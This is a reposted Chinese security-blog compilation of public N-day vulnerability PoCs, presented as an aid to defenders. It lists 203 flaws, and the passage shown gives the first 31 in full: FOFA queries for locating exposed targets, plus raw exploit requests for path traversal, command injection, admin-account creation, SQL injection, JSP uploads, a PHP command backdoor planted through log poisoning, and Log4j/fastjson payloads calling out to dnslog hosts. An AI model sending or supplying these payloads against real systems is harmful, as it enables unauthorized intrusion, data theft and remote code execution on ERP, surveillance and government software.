互联网公开漏洞整理202309-202406--转载
互联网公开漏洞整理202309-202406道一安全 2024-06-05 07:41 北京
以下文章来源于网络安全新视界 ,作者网络安全新视界
发文目的:Nday漏洞的利用是安全攻防占比较大的攻击方式,希望文章对大家的防守提供一定帮助。防守同学可根据本文内容进行风险排查。
漏洞来源:文章涵盖2023年9月至2024年5月国内外公开的高危害漏洞POC共203个,均来自于互联网其他公众号或者网站,由网络安全新视界团队进行整理发布。
安全补丁:所有的漏洞均为公开漏洞,补丁或漏洞修复方案请联系产品厂家。
文章内容:因受篇幅限制,个别漏洞POC由于过长,统一使用PAYLOAD字样代替,如需完整POC请自行搜索。
合法权益:如文章内容侵犯某方合法权益,请后台联系网络安全新视界团队对相关内容进行删除。
声明
为简化流程,方便大家翻阅,固不设置“回复再给完整列表”。本文章就是当前最全文章,使用时F12搜索关键词即可。
有需要的可以收藏此文。也可以关注本公众号(网络安全新视界)。
目录
01
1. StarRocks MPP数据库未授权访问
2. Casdoor系统static任意文件读取
3. EasyCVR智能边缘网关 userlist 信息泄漏
4. EasyCVR视频管理平台存在任意用户添加
5. NUUO NVR 视频存储管理设备远程命令执行
6. 深信服 NGAF 任意文件读取
7. 鸿运主动安全监控云平台任意文件下载
8. 斐讯 Phicomm 路由器RCE
9. 稻壳CMS keyword 未授权SQL注入
10. 蓝凌EIS智慧协同平台api.aspx任意文件上传
11. 蓝凌EIS智慧协同平台 doc_fileedit_word.aspx SQL注入
12. Jorani < 1.0.2 远程命令执行
13. 红帆iOffice ioFileDown任意文件读取
14. 华夏ERP(jshERP)敏感信息泄露
15. 华夏ERP getAllList信息泄露
16. 红帆HFOffice医微云SQL注入
17. 大华 DSS itcBulletin SQL 注入
18. 大华 DSS 数字监控系统 user_edit.action 信息泄露
19. 大华 DSS 数字监控系统 attachment_clearTempFile.action SQL注入
20. 大华ICC智能物联综合管理平台任意文件读取
21. 大华ICC智能物联综合管理平台random远程代码执行
22. 大华ICC智能物联综合管理平台 log4j远程代码执行
23. 大华ICC智能物联综合管理平台 fastjson远程代码执行
24. 用友NC 6.5 accept.jsp任意文件上传
25. 用友NC registerServlet JNDI 远程代码执行
26. 用友NC linkVoucher SQL注入
27. 用友 NC showcontent SQL注入
28. 用友NC grouptemplet 任意文件上传
29. 用友NC down/bill SQL注入
30. 用友NC importPml SQL注入
31. 用友NC runStateServlet SQL注入
32. 用友NC complainbilldetail SQL注入
33. 用友NC downTax/download SQL注入
34. 用友NC warningDetailInfo接口SQL注入
35. 用友NC-Cloud importhttpscer任意文件上传
36. 用友NC-Cloud soapFormat XXE
37. 用友NC-Cloud IUpdateService XXE
38. 用友U8 Cloud smartweb2.RPC.d XXE
39. 用友U8 Cloud RegisterServlet SQL注入
40. 用友U8-Cloud XChangeServlet XXE
41. 用友U8 Cloud MeasureQueryByToolAction SQL注入
42. 用友GRP-U8 SmartUpload01 文件上传
43. 用友GRP-U8 userInfoWeb SQL注入致RCE
44. 用友GRP-U8 bx_dj_check.jsp SQL注入
45. 用友GRP-U8 ufgovbank XXE
46. 用友GRP-U8 sqcxIndex.jsp SQL注入
47. 用友GRP A++Cloud 政府财务云 任意文件读取
48. 用友U8 CRM swfupload 任意文件上传
49. 用友U8 CRM系统uploadfile.php接口任意文件上传
50. QDocs Smart School 6.4.1 filterRecords SQL注入
51. 云时空社会化商业 ERP 系统 validateLoginName SQL 注入
52. 泛微E-Office json_common.php sql注入
53. 迪普 DPTech VPN Service 任意文件上传
54. 畅捷通T+ getstorewarehousebystore 远程代码执行
55. 畅捷通T+ getdecallusers信息泄露
56. 畅捷通T+ RRATableController,Ufida.T.DI.UIP.ashx 反序列化RCE
57. 畅捷通T+ keyEdit.aspx SQL注入
58. 畅捷通T+ KeyInfoList.aspx sql注入
59. XETUX 软件 dynamiccontent.properties.xhtml 远程代码执行
60. 百卓Smart管理平台 importexport.php SQL注入
61. 浙大恩特客户资源管理系统 fileupload 任意文件上传
62. IP-guard WebServer 远程命令执行
63. IP-guard WebServer任意文件读取
64. 捷诚管理信息系统CWSFinanceCommon SQL注入
65. 优卡特脸爱云一脸通智慧管理平台1.0.55.0.0.1权限绕过
66. 万户ezOFFICE协同管理平台SendFileCheckTemplateEdit-SQL注入
67. 万户ezOFFICE wpsservlet任意文件上传
68. 万户ezOFFICE wf_printnum.jsp SQL注入
69. 万户 ezOFFICE contract_gd.jsp SQL注入
70. 万户ezEIP success 命令执行
71. 邦永PM2项目管理系统 Global_UserLogin.aspx SQL注入
72. 致远OA getAjaxDataServlet XXE
73. GeoServer wms远程代码执行
74. 致远M3-server 6_1sp1 反序列化RCE
75. Telesquare TLR-2005Ksh 路由器 admin.cgi RCE
76. 新开普掌上校园服务管理平台service.action远程命令执行
77. F22服装管理软件系统UploadHandler.ashx任意文件上传
78. pkpmbs 建设工程质量监督系统 FileUpload.ashx 文件上传
79. BYTEVALUE 百为流控路由器远程命令执行
80. 速达天耀软件DesignReportSave.jsp接口存在任意文件上传
81. 宇视科技视频监控宇视(Uniview)main-cgi密码泄露
82. 思福迪LOGBASE运维安全管理系统 test_qrcode_b 远程命令执行
83. JeecgBoot testConnection 远程命令执行
84. Jeecg-Boot JimuReport queryFieldBySql 模板注入
85. SysAid On-premise< 23.3.36远程代码执行
86. 日本tosei自助洗衣机RCE
87. 安恒明御安全网关aaa_local_web_preview文件上传
88. 安恒明御安全网关 aaa_portal_auth_config_reset 远程命令执行
89. 致远互联FE协作办公平台editflow_manager存在sql注入
90. 海康威视IP网络对讲广播系统3.0.3_20201113_RELEASE远程命令执行
91. 海康威视综合安防管理平台orgManage/v1/orgs/download任意文件读取
92. 海康威视运行管理中心session命令执行
93. 奇安信网神SecGate3600防火墙app_av_import_save任意文件上传
94. 奇安信网神SecGate3600防火墙obj_area_import_save任意文件上传
95. Apache-OFBiz < 18.12.10 xmlrpc远程代码执行
96. Apache OFBiz18.12.11 groovy 远程代码执行
97. OneBlog v2.2.2 博客Shiro反序列化远程命令执行
98. SpiderFlow爬虫平台远程命令执行
99. Ncast盈可视高清智能录播系统busiFacade RCE
100. Likeshop 2.5.7.20210311 File.php userFormImage 文件上传
101. ivanti policy secure-22.6命令注入
102. Ivanti Pulse Connect Secure VPN SSRF致远程代码执行
103. Ivanti Pulse Connect Secure VPN XXE
104. Totolink T8 设置 cstecgi.cgi getSysStatusCfg 信息泄露
105. SpringBlade v3.2.0 export-user SQL 注入
106. SpringBlade dict-biz/list SQL 注入
107. SpringBlade tenant/list SQL 注入
108. D-Tale 3.9.0 SSRF
109. Jenkins CLI 任意文件读取
110. Goanywhere MFT 未授权创建管理员
111. WordPress Plugin HTML5 Video Player SQL注入
112. WordPress Plugin NotificationX SQL 注入
113. WordPress Automatic 插件任意文件下载和SSRF
114. WordPress MasterStudy LMS插件 SQL注入
115. WordPress Bricks Builder <= 1.9.6 RCE
116. wordpress js-support-ticket文件上传
117. WordPress LayerSlider插件SQL注入
118. 北京百绰智能S210管理平台uploadfile.php任意文件上传
119. 北京百绰智能S20后台sysmanageajax.php sql注入
120. 北京百绰智能S40管理平台导入web.php任意文件上传
121. 北京百绰智能S42管理平台userattestation.php任意文件上传
122. 北京百绰智能s200管理平台/importexport.php sql注入
123. Atlassian Confluence 模板注入代码执行
124. 湖南建研工程质量检测系统任意文件上传
125. ConnectWise ScreenConnect身份验证绕过
126. Aiohttp 路径遍历
127. 广联达Linkworks DataExchange.ashx XXE
128. Adobe ColdFusion 反序列化
129. Adobe ColdFusion 任意文件读取
130. Laykefu客服系统任意文件上传
131. Mini-Tmall <=20231017 SQL注入
132. JetBrains TeamCity 2023.11.3 及以下版本存在身份验证绕过
133. H5 云商城 file.php 文件上传
134. 网康NS-ASG应用安全网关index.php sql注入
135. 网康NS-ASG应用安全网关list_ipAddressPolicy.php sql注入
136. NextChat cors SSRF
137. 福建科立迅通信指挥调度平台down_file.php sql注入
138. 福建科立讯通信指挥调度平台pwd_update.php sql注入
139. 福建科立讯通信指挥调度平台editemedia.php sql注入
140. 福建科立讯通信指挥调度平台get_extension_yl.php sql注入
141. 建科立讯通信指挥调度管理平台 ajax_users.php SQL注入
142. CMSV6车辆监控平台系统中存在弱密码
143. Netis WF2780 v2.1.40144 远程命令执行
144. D-Link nas_sharing.cgi 命令注入
145. Palo Alto Networks PAN-OS GlobalProtect 命令注入
146. MajorDoMo thumb.php 未授权远程代码执行
147. RaidenMAILD邮件服务器v.4.9.4-路径遍历
148. CrushFTP 认证绕过模板注入
149. AJ-Report开源数据大屏存在远程命令执行
150. AJ-Report 1.4.0 认证绕过与远程代码执行
151. AJ-Report 1.4.1 pageList sql注入
152. Progress Kemp LoadMaster 远程命令执行
153. gradio任意文件读取
154. 天维尔消防救援作战调度平台 SQL注入
155. 六零导航页 file.php 任意文件上传
156. TBK DVR-4104/DVR-4216 操作系统命令注入
157. 美特CRM upload.jsp 任意文件上传
158. Mura-CMS-processAsyncObject存在SQL注入
159. 英飞达医学影像存档与通信系统 WebJobUpload 任意文件上传
160. Sonatype Nexus Repository 3目录遍历与文件读取
161. 科拓全智能停车收费系统 Webservice.asmx 任意文件上传
162. 和丰多媒体信息发布系统 QH.aspx 任意文件上传
163. 号卡极团分销管理系统 ue_serve.php 任意文件上传
164. 慧校园(安校易)管理系统 FileUpProductupdate.aspx 任意文件上传
165. OrangeHRM 3.3.3 SQL 注入
166. 中成科信票务管理平台SeatMapHandler SQL注入
167. 精益价值管理系统 DownLoad.aspx任意文件读取
168. 宏景EHR OutputCode 任意文件读取
169. 宏景EHR downlawbase SQL注入
170. 宏景EHR DisplayExcelCustomReport 任意文件读取
171. 通天星CMSV6车载定位监控平台 SQL注入
172. DT-高清车牌识别摄像机任意文件读取
173. Check Point 安全网关任意文件读取
174. 金和OA C6 FileDownLoad.aspx 任意文件读取
175. 金和OA C6 IncentivePlanFulfill.aspx SQL注入
176. 电信网关配置管理系统 rewrite.php 文件上传
177. H3C路由器敏感信息泄露
178. H3C校园网自助服务系统-flexfileupload-任意文件上传
179. 建文工程管理系统存在任意文件读取
180. 帮管客 CRM jiliyu SQL注入
181. 润申科技企业标准化管理系统 UpdataLogHandler.ashx SQL注入
182. 润申科技企业标准化管理系统AddNewsHandler.ashx 任意用户创建
183. 广州图创图书馆集群管理系统 updOpuserPw SQL注入
184. 迅饶科技 X2Modbus 网关 AddUser 任意用户添加
185. 瑞友天翼应用虚拟化系统SQL注入
186. F-logic DataCube3 SQL注入
187. Mura CMS processAsyncObject SQL注入
188. 叁体-佳会视频会议 attachment 任意文件读取
189. 蓝网科技临床浏览系统 deleteStudy SQL注入
190. 短视频矩阵营销系统 poihuoqu 任意文件读取
191. 亿赛通电子文档安全管理系统 NavigationAjax SQL注入
192. 富通天下外贸ERP UploadEmailAttr 任意文件上传
193. 山石网科云鉴安全管理系统 setsystemtimeaction 命令执行
194. 飞企互联-FE企业运营管理平台 uploadAttachmentServlet 任意文件上传
195. 飞鱼星上网行为管理系统 send_order.cgi命令执行
196. 河南省风速科技统一认证平台密码重置
197. 浙大恩特客户资源管理系统-Quotegask_editAction存在SQL注入
198.阿里云盘 WebDAV 命令注入
199. cockpit系统assetsmanager_upload接口 文件上传
200. SeaCMS海洋影视管理系统dmku SQL注入
201. 方正全媒体新闻采编系统 binary SQL注入
202. 微擎系统 AccountEdit任意文件上传
203. 红海云EHR PtFjk 文件上传
POC列表
02
1. StarRocks MPP数据库未授权访问
FOFA :title="StarRocks"
GET /mem_tracker HTTP/1.1
Host: URL
2. Casdoor系统static任意文件读取
FOFA :title="Casdoor"
GET /static/../../../../../../../../../../../etc/passwd HTTP/1.1
Host: xx.xx.xx.xx:9999
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip
3. EasyCVR智能边缘网关 userlist 信息泄漏
FOFA :title="EasyCVR"
GET /api/v1/userlist?pageindex=0&pagesize=10 HTTP/1.1
Host: xx.xx.xx.xx
4. EasyCVR视频管理平台存在任意用户添加
FOFA :title="EasyCVR"
password更改为自己的密码md5
POST /api/v1/adduser HTTP/1.1
Host: your-ip
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
name=admin888&username=admin888&password=0e7517141fb53f21ee439b355b5a1d0a&roleid=1
5. NUUO NVR 视频存储管理设备远程命令执行
FOFA:title="Network Video Recorder Login"
GET /__debugging_center_utils___.php?log=;whoami HTTP/1.1
Host: xx.xx.xx.xx
6. 深信服 NGAF 任意文件读取
FOFA:title="SANGFOR | NGAF"
GET /svpn_html/loadfile.php?file=/etc/./passwd HTTP/1.1
Host:
7. 鸿运主动安全监控云平台任意文件下载
FOFA:body="./open/webApi.html"
GET /808gps/MobileAction_downLoad.action?path=/WEB-INF/classes/config/jdbc.properties HTTP/1.1
Host:
8. 斐讯 Phicomm 路由器RCE
FOFA:icon_hash="-1344736688"
默认账号admin登录后台后,执行操作
POST /cgi-bin/luci/;stok=bcd6ccd2fa5d212ce6431ca22f10b96d/admin/wifireboot HTTP/1.1
Host: x.x.x.x
Cookie: sysauth=第一步登录获取的cookie
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryxbgjoytz
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
------WebKitFormBoundaryxbgjoytz
Content-Disposition: form-data; name="wifiRebootEnablestatus"
%s
------WebKitFormBoundaryxbgjoytz
Content-Disposition: form-data; name="wifiRebootrange"
12:00; id;
------WebKitFormBoundaryxbgjoytz
Content-Disposition: form-data; name="wifiRebootendrange"
%s:
------WebKitFormBoundaryxbgjoytz
Content-Disposition: form-data; name="cururl2"
------WebKitFormBoundaryxbgjoytz--
9. 稻壳CMS keyword 未授权SQL注入
FOFA:app="Doccms"
GET /search/index.php?keyword=1%25%32%37%25%32%30%25%36%31%25%36%65%25%36%34%25%32%30%25%32%38%25%36%35%25%37%38%25%37%34%25%37%32%25%36%31%25%36%33%25%37%34%25%37%36%25%36%31%25%36%63%25%37%35%25%36%35%25%32%38%25%33%31%25%32%63%25%36%33%25%36%66%25%36%65%25%36%33%25%36%31%25%37%34%25%32%38%25%33%30%25%37%38%25%33%37%25%36%35%25%32%63%25%32%38%25%37%33%25%36%35%25%36%63%25%36%35%25%36%33%25%37%34%25%32%30%25%37%35%25%37%33%25%36%35%25%37%32%25%32%38%25%32%39%25%32%39%25%32%63%25%33%30%25%37%38%25%33%37%25%36%35%25%32%39%25%32%39%25%32%39%25%32%33 HTTP/1.1
Host: x.x.x.x
payload为下列语句的二次Url编码
' and (extractvalue(1,concat(0x7e,(select user()),0x7e)))#
10. 蓝凌EIS智慧协同平台api.aspx任意文件上传
FOFA:icon_hash="953405444"
文件上传后响应中包含上传文件的路径
POST /eis/service/api.aspx?action=saveImg HTTP/1.1
Host: x.x.x.x:xx
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36
Content-Length: 197
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryxdgaqmqu
------WebKitFormBoundaryxdgaqmqu
Content-Disposition: form-data; name="file"filename="icfitnya.txt"
Content-Type: text/html
jmnqjfdsupxgfidopeixbgsxbf
------WebKitFormBoundaryxdgaqmqu--
11. 蓝凌EIS智慧协同平台 doc_fileedit_word.aspx SQL注入
FOFA:icon_hash="953405444" || app="Landray-EIS智慧协同平台"
GET /dossier/doc_fileedit_word.aspx?recordid=1'%20and%201=@@version--+&edittype=1,1 HTTP/1.1
Host: 127.0.0.1
Pragma: no-cache
Cache-Control: no-cache
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Connection: close
12. Jorani < 1.0.2 远程命令执行
FOFA:title="Jorani"
第一步先拿到cookie
GET /session/login HTTP/1.1
Host: 192.168.190.30
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36
Connection: close
Accept-Encoding: gzip
响应中csrf_cookie_jorani用于后续请求
HTTP/1.1 200 OK
Connection: close
Cache-Control: no-store, no-cache, must-revalidate
Content-Type: text/html; charset=UTF-8
Date: Tue, 24 Oct 2023 09:34:28 GMT
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Tue, 24 Oct 2023 09:34:28 GMT
Pragma: no-cache
Server: Apache/2.4.54 (Debian)
Set-Cookie: csrf_cookie_jorani=6ca560f2b0baf3cda87c818a4a15dc77; expires=Tue, 24-Oct-2023 11:34:28 GMT; Max-Age=7200; path=/
Set-Cookie: jorani_session=bqk0ttr6q2mg3tae6rd75ei02umkq99r; expires=Tue, 24-Oct-2023 11:34:28 GMT; Max-Age=7200; path=/; HttpOnly
Vary: Accept-Encoding
POST请求,执行函数并进行base64编码
POST /session/login HTTP/1.1
Host: 192.168.190.30
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36
Connection: close
Content-Length: 252
Content-Type: application/x-www-form-urlencoded
Cookie: csrf_cookie_jorani=6ca560f2b0baf3cda87c818a4a15dc77; jorani_session=bqk0ttr6q2mg3tae6rd75ei02umkq99r
Accept-Encoding: gzip
csrf_test_jorani=6ca560f2b0baf3cda87c818a4a15dc77&last_page=session%2Flogin&language=..%2F..%2Fapplication%2Flogs&login=<?php if(isset($_SERVER['HTTP_K1SYJPMHLU4Z'])){system(base64_decode($_SERVER['HTTP_K1SYJPMHLU4Z']));} ?>&CipheredValue=DummyPasswor
向靶场发送如下请求,执行id命令,请求头中的ZWNobyAtLS0tLS0tLS07aWQgMj4mMTtlY2hvIC0tLS0tLS0tLTs=是命令base64编码后的字符串
GET /pages/view/log-2023-10-24 HTTP/1.1
Host: 192.168.190.30
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
Connection: close
Cookie: csrf_cookie_jorani=6ca560f2b0baf3cda87c818a4a15dc77; jorani_session=bqk0ttr6q2mg3tae6rd75ei02umkq99r
K1SYJPMHLU4Z: ZWNobyAtLS0tLS0tLS07aWQgMj4mMTtlY2hvIC0tLS0tLS0tLTs=
X-REQUESTED-WITH: XMLHttpRequest
Accept-Encoding: gzip
13. 红帆iOffice ioFileDown任意文件读取
FOFA:app="红帆-ioffice"
GET /ioffice/prg/interface/ioFileDown.aspx?sFilePath=c:/windows/win.ini HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36
Connection: close
Accept: */*
Accept-Encoding: gzip
14. 华夏ERP(jshERP)敏感信息泄露
FOFA:body="jshERP-boot"
泄露内容包括用户名密码
GET /jshERP-boot/user/getAllList;.ico HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip
15. 华夏ERP getAllList信息泄露
CVE-2024-0490
FOFA:body="jshERP-boot"
泄露内容包括用户名密码
GET /jshERP-boot/user/a.ico/../getAllList HTTP/1.1
Host: 192.168.40.130:100
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36
Connection: close
Accept: application/signed-exchange;v=b3;q=0.7,*/*;q=0.8
Accept-Language: en
sec-ch-ua-platform: Windows
Accept-Encoding: gzip
16.红帆HFOffice医微云SQL注入
FOFA:title="HFOffice"
poc中调用函数计算1234的md5值
GET /api/switch-value/list?sorts=%5B%7B%22Field%22:%221-CONVERT(VARCHAR(32),%20HASHBYTES(%27MD5%27,%20%271234%27),%202);%22%7D%5D&conditions=%5B%5D&_ZQA_ID=4dc296c6c69905a7 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip
17. 大华 DSS itcBulletin SQL 注入
FOFA:app="dahua-DSS"
POST /portal/services/itcBulletin?wsdl HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Content-Length: 345
Accept-Encoding: gzip
<s11:Envelope xmlns:s11='http://schemas.xmlsoap.org/soap/envelope/'>
<s11:Body>
<ns1:deleteBulletin xmlns:ns1='http://itcbulletinservice.webservice.dssc.dahua.com'>
<netMarkings>
(updatexml(1,concat(0x7e,md5(102103122),0x7e),1))) and (1=1
</netMarkings>
</ns1:deleteBulletin>
</s11:Body>
</s11:Envelope>
18. 大华 DSS 数字监控系统 user_edit.action 信息泄露
FOFA:app="dahua-DSS"
GET /admin/cascade_/user_edit.action?id=1 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive
19. 大华 DSS 数字监控系统 attachment_clearTempFile.action SQL注入
FOFA:app="dahua-DSS"
GET /portal/attachment_clearTempFile.action?bean.RecId=1%27)%20AND%20EXTRACTVALUE(8841,CONCAT(0x7e,user(),0x7e))%20AND%20(%27mYhO%27=%27mYhO&bean.TabName=1 HTTP/1.1
Host:
User-Agent:Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive
20. 大华ICC智能物联综合管理平台任意文件读取
FOFA:body="*客户端会小于800*"
GET /evo-apigw/evo-cirs/file/readPic?fileUrl=file:/etc/passwd HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip
21. 大华ICC智能物联综合管理平台random远程代码执行
FOFA:icon_hash="-1935899595"
POST /evo-runs/v1.0/auths/sysusers/random HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Length: 161
Accept-Encoding: gzip
Connection: close
Content-Type: application/json;charset=utf-8
{
"a":{
"@type":"com.alibaba.fastjson.JSONObject",
{"@type":"java.net.URL","val":"http://farr9frh.dnslog.pw"}
}""
}
22. 大华ICC智能物联综合管理平台 log4j远程代码执行
FOFA:icon_hash="-1935899595"
POST /evo-apigw/evo-brm/1.2.0/user/is-exist HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Content-Type: application/json;charset=utf-8
{
"loginName":"${jndi:ldap://dnslog}"
}
23. 大华ICC智能物联综合管理平台 fastjson远程代码执行
FOFA:icon_hash="-1935899595"
POST /evo-runs/v1.0/auths/sysusers/random HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Type: application/json;charset=utf-8
Accept-Encoding: gzip
Connection: close
{
"a":{
"@type":"com.alibaba.fastjson.JSONObject",
{"@type":"java.net.URL","val":"http://DNSLOG"}
}""
}
24. 用友NC 6.5 accept.jsp任意文件上传
FOFA:icon_hash="1085941792"
POST /aim/equipmap/accept.jsp HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36
Connection: close
Content-Length: 449
Accept: */*
Accept-Encoding: gzip
Content-Type: multipart/form-data; boundary=---------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc
-----------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc
Content-Disposition: form-data; name="upload"; filename="2XpU7VbkFeTFZZLbSMlVZwJyOxz.txt"
Content-Type: text/plain
<% out.println("2XpU7Y2Els1K9wZvOlSmrgolNci"); %>
-----------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc
Content-Disposition: form-data; name="fname"
\webapps\nc_web\2XpU7WZCxP3YJqVaC0EjlHM5oAt.jsp
-----------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc--
25. 用友NC registerServlet JNDI 远程代码执行
FOFA:app="用友-UFIDA-NC"
POST /portal/registerServlet HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:71.0) Gecko/20100101 Firefox/71.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*; q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh,en-US;q=0.9,en-GB;q=0.8,en;q=0.7,zh-CN;q=0.6
Content-Type: application/x-www-form-urlencoded
type=1&dsname=ldap://dnslog
26. 用友NC linkVoucher SQL注入
FOFA:app="用友-UFIDA-NC"
GET /portal/pt/yercommon/linkVoucher?pageId=login&pkBill=1'waitfor+delay+'0:0:5'-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive
27. 用友 NC showcontent SQL注入
FOFA:icon_hash="1085941792"
GET /ebvp/infopub/showcontent?id=1'+AND+1=DBMS_PIPE.RECEIVE_MESSAGE(1,5)-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Accept-Encoding: identity
Connection: close
Content-Type: text/xml; charset=utf-8
28. 用友NC grouptemplet 任意文件上传
FOFA:icon_hash="1085941792"
POST /uapim/upload/grouptemplet?groupid=nc&fileType=jsp HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
Connection: close
Content-Length: 268
Content-type: multipart/form-data; boundary=----------ny4hGVLLpZPZm0CE3KNtyhNSXvFgk
Accept-Encoding: gzip
------------ny4hGVLLpZPZm0CE3KNtyhNSXvFgk
Content-Disposition: form-data; name="upload"; filename="2fiu0YTGkaX2DrJlUZZP5IGvNvk.jsp"
Content-Type: application/octet-stream
<%out.println("2fiu0WM4788fa6NcMHipkIthTTW");%>
------------ny4hGVLLpZPZm0CE3KNtyhNSXvFgk--
/uapim/static/pages/nc/head.jsp
29. 用友NC down/bill SQL注入
FOFA:icon_hash="1085941792" && body="/logo/images/logo.gif"
GET /portal/pt/erfile/down/bill?pageId=login&id=1'+AND+4563=DBMS_PIPE.RECEIVE_MESSAGE(CHR(65),5)-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive
30. 用友NC importPml SQL注入
FOFA:icon_hash="1085941792" && body="/logo/images/logo.gif"
POST /portal/pt/portalpage/importPml?pageId=login&billitem=1'WAITFOR+DELAY+'0:0:5'-- HTTP/1.1
Host: your-ip
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryH970hbttBhoCyj9V
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
Connection: close
------WebKitFormBoundaryH970hbttBhoCyj9V
Content-Disposition: form-data; name="Filedata"; filename="1.jpg"
Content-Type: image/jpeg
------WebKitFormBoundaryH970hbttBhoCyj9V--
31. 用友NC runStateServlet SQL注入
version<=6.5
FOFA:icon_hash="1085941792" && body="/logo/images/logo.gif"
GET /portal/pt/servlet/runStateServlet/doPost?pageId=login&proDefPk=1'waitfor+delay+'0:0:5'-- HTTP/1.1
Host: host
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
Content-Type: application/x-www-form-urlencoded
32. 用友NC complainbilldetail SQL注入
